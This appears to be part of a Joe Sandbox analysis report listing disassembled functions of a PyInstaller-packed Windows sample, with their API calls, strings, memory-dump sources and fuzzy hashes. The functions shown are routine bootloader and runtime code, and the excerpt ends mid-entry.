APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A326343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A326730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3269CC

Strings

p, xrefs: 00007FF79A3263F5
-, xrefs: 00007FF79A3263D9
f, xrefs: 00007FF79A326465
:, xrefs: 00007FF79A3264FC
p, xrefs: 00007FF79A32646D

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: b204774df767de4cc455d83b663f4b1b948884128e14486b2bb680a5435abb2f
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 4E127F62E0E14386FB74BA25A154679F692FF40750FD4C17DEE9A46AC4DF3CE5808B20

Function 00007FF79A321038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A321078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A321440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3216DF

Strings

f, xrefs: 00007FF79A321110
p, xrefs: 00007FF79A32111D
f, xrefs: 00007FF79A32117A
p, xrefs: 00007FF79A321182
f, xrefs: 00007FF79A3212C5

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 855a4d690a0ad25160f0d1e234178d31203c7a63648245964dd0b59980ceeac7
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 5B126132E0E14386FF70BA25A25467AF662FB80754FD8407DEF99469C4DB7DE4808B60

Function 00007FF79A311050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

fseek, xrefs: 00007FF79A3110D3
malloc, xrefs: 00007FF79A31110F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF79A3111F6
Failed to extract %s: failed to open archive file!, xrefs: 00007FF79A311098
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF79A311108
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF79A3110CC
fread, xrefs: 00007FF79A3111FD

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
Instruction ID: d9a40c6133c7709e453d0ba19bfdb75d33054329388b94ad67079dad1ffceb43
Opcode Fuzzy Hash: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
Instruction Fuzzy Hash: 86418E61B0A65292FA20FB32A8046B9F390BF45BC4FC444BEED0D07796DE3CE5058760

Function 00007FF79A311470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

fseek, xrefs: 00007FF79A3114E5
malloc, xrefs: 00007FF79A31151F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF79A3115DF
Failed to extract %s: failed to open archive file!, xrefs: 00007FF79A31149F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF79A311518
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF79A3114DE
fread, xrefs: 00007FF79A3115E6

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
Instruction ID: b0e3666f0701b6b8ee9c2ca97a87f222c2f8db18dccc6f9d51e3304b4f6776b1
Opcode Fuzzy Hash: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
Instruction Fuzzy Hash: 77415E22B0A64296FA20EF3194415F9F390EF44798FC445BEED4D07B99DE3CE5468724

Function 00007FF79A31EA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF79A31EAD5

Part of subcall function 00007FF79A31FA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF79A31FA6F
Part of subcall function 00007FF79A31FA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF79A31FA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF79A31EBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF79A31EDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF79A31EF08

Strings

csm, xrefs: 00007FF79A31EAEF
csm, xrefs: 00007FF79A31EBD0
csm, xrefs: 00007FF79A31EB56

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: f474149996b6a1c347da7fb6d685d38051a96b22233f299b68f64eb1c7eb1aea
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: C0D16B22A097418AFB20EB3594803BDB7A0FB45788FA0417EEE4D57B95DF39E081C760

Function 00007FF79A312C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312D63
MessageBoxW.USER32 ref: 00007FF79A312D99

Strings

<FormatMessageW failed.>, xrefs: 00007FF79A312D70
%ls: , xrefs: 00007FF79A312D22
Error, xrefs: 00007FF79A312D8C
[PYI-%d:ERROR] , xrefs: 00007FF79A312CA6

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: f874663e905ea0a42771c04dbbe135fa9c96c8189b78b5e59d2757a39e82fc7d
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: D931B422B09B4142F630FB76B8442AAB695BF88798F80013DEF4D97B59DE3CD506C310

Function 00007FF79A31DD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DDBD
GetLastError.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DDF5
FreeLibrary.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DE63
GetProcAddress.KERNEL32(?,?,?,00007FF79A31DFEA,?,?,?,00007FF79A31DCDC,?,?,?,00007FF79A31D8D9), ref: 00007FF79A31DE6F

Strings

api-ms-, xrefs: 00007FF79A31DDDD

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: 1f0bd83040a55d53c6d5b4b6819bfb02be1bffa582e94192a484a4dc266990fa
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: 1C316A21B1BA4291FE32EB22A800965B394FF59BE1FD9457DED1D46394EF3CE4448230

Function 00007FF79A316350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

ucrtbase.dll, xrefs: 00007FF79A3163CD
Failed to load Python DLL '%ls'., xrefs: 00007FF79A316497
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF79A3163B7
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF79A316446
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF79A3163F7
LoadLibrary, xrefs: 00007FF79A31649E

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction ID: 46f8135214d4901e76f154056be3ef0838f3a313fe8241fec1de31a919c01be0
Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction Fuzzy Hash: 61415C61B0EA8691FA31EB71E4552EAB351FB44384FC0417EEA5D43696EF3CE609C360

Function 00007FF79A312A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF79A31351A,?,00000000,00007FF79A313F23), ref: 00007FF79A312AA0

Strings

[PYI-%d:%s] , xrefs: 00007FF79A312AA8
Warning [ANSI Fallback], xrefs: 00007FF79A312B0F
Warning, xrefs: 00007FF79A312B1E
WARNING, xrefs: 00007FF79A312AAF
0, xrefs: 00007FF79A312B16

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 366ca9ae1c83fe915555ca5047e42d73b1c72a33ed67f77454b9a75b4c914870
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 85217F32A1A78182F670EB61B8817E6B394FB88784F80017EFE8C43659DF7CD6458750

Function 00007FF79A32B1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF79A32B1CF
FlsGetValue.KERNEL32 ref: 00007FF79A32B1E4
FlsSetValue.KERNEL32 ref: 00007FF79A32B205
FlsSetValue.KERNEL32 ref: 00007FF79A32B232
FlsSetValue.KERNEL32 ref: 00007FF79A32B243
FlsSetValue.KERNEL32 ref: 00007FF79A32B254
SetLastError.KERNEL32 ref: 00007FF79A32B26F

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
Instruction ID: 40b21d87861405551dd29c9adcbdeb250ea76e23b17a8eca0879de3400dcda30
Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
Instruction Fuzzy Hash: 20210C20E0F34642FA787B71AA5917DF2929F447A0F9486BCED3E466D6DE2CB8414320

Function 00007FF79A337DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF79A337E0D
GetLastError.KERNEL32 ref: 00007FF79A337E19
CloseHandle.KERNEL32 ref: 00007FF79A337E31
CreateFileW.KERNEL32 ref: 00007FF79A337E5C
WriteConsoleW.KERNEL32 ref: 00007FF79A337E7B

Strings

CONOUT$, xrefs: 00007FF79A337E3D

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: a82c8a6454abc9f9a96854bade8cba12e1fb63ec7c658794435a6b7df54cae6c
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: 4C118721B1DA4586F360AB62F854329B3A0FB48FE4F90427CEA5D877A4DF7CD8048750

Function 00007FF79A318560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF79A319216), ref: 00007FF79A318592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A3185E9

Part of subcall function 00007FF79A319400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF79A3145E4,00000000,00007FF79A311985), ref: 00007FF79A319439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A318678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A3186E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A3186F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A31870A

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction ID: dba5e01fc88a54f0df9eb652ebd4e3ee7c3ac9c6ab4bfd903598468ac0cea3c9
Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction Fuzzy Hash: 2B418162B1A68241FA70EB32A5446AAB394FB84BC4F85027DDF8D57B89DE3CD501C724

Function 00007FF79A32B338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B347
FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B37D
FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3AA
FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3BB
FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3CC
SetLastError.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3E7

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
Instruction ID: 38e3362a4eacfb75e83ecbf16b4a28812e42bfc1184b3967348f694af00986e0
Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
Instruction Fuzzy Hash: CE113B20B0E64282FA74BB319A5517DF2829F447A0FD487BCEE2E467D6DE2CB4018321

Function 00007FF79A312910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF79A311B6A), ref: 00007FF79A31295E

Strings

%s: %s, xrefs: 00007FF79A3129E8
Error [ANSI Fallback], xrefs: 00007FF79A3129FF
[PYI-%d:ERROR] , xrefs: 00007FF79A312966
Error, xrefs: 00007FF79A312A0E

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: f501e8dbccc9f18aa5ac0fcba33b4eebf876968e719e9e4b1fa66b54cfee513b
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: 6531B522B1A68152F730EB75A8416E6B295BF887D8F80013DFE8D83755EF7CD5468610

Function 00007FF79A312390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF79A3123C8
DialogBoxIndirectParamW.USER32 ref: 00007FF79A31248E
DeleteObject.GDI32 ref: 00007FF79A3124C1
DestroyIcon.USER32 ref: 00007FF79A3124D3

Strings

Unhandled exception in script, xrefs: 00007FF79A3123F8

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
